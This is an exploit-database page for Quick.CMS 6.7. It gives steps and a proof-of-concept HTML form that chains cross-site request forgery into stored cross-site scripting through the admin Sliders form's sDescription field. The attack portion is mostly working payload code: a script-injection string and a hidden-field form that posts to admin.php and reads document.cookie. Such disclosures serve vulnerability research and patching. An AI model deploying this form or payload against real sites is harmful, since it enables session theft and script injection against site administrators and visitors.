Quick.cms 6.7 cross site request forgery (csrf) to cross site scripting (xss) (authenticated) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-11-17 | Type : webapps | Platform : php
This exploit / vulnerability Quick.cms 6.7 cross site request forgery (csrf) to cross site scripting (xss) (authenticated) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Quick.CMS 6.7 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Date: 21/04/2021
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
# Version: 6.7
# Tested on: Windows 8.1, Kali Linux, Burp Suite

Steps to Reproduce:

1. At first login to your panel
2. then click the "Sliders" menu to "New Slider"
3. now intercept with the burp suite and save a new slider
4. Then use XSS payload </textarea><script>alert(document.domain)</script> in sDescription value.
5. Now Generate a CSRF POC

<!DOCTYPE html>
<html>
<body>
<form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST">
<input type="hidden" name="iSlider" value="">
<input type="hidden" name="aFile" filename="">
<input type="hidden" name="sFileNameOnServer" value="slider_2.jpg">
<input type="hidden" name="sDescription"
value="test</textarea><script>alert(document.cookie)</script>">
<input type="hidden" name="iPosition" value="1">
<input type="hidden" name="sOption" value="save">
<input type="submit" value="submit">
</form>
</body>
</html>